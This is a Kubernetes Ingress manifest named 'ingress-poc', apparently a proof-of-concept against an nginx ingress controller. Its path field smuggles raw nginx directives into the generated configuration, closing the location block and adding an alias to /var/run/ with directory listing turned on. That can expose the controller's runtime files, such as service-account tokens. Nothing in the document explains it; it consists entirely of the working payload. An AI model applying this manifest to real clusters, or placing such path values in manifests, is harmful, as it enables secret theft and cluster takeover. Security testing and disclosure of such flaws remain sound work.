apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: ingress-poc
  namespace: engine-x-line-three
spec:
  ingressClassName: nginx-three
  rules:
  - http:
      paths:
      - path: "/poc{\nalias #\n/var/run/;\nautoindex on;\n}\nlocation /other"
        pathType: Prefix
        backend:
          service:
            name: placeholder
            port:
              number: 1234
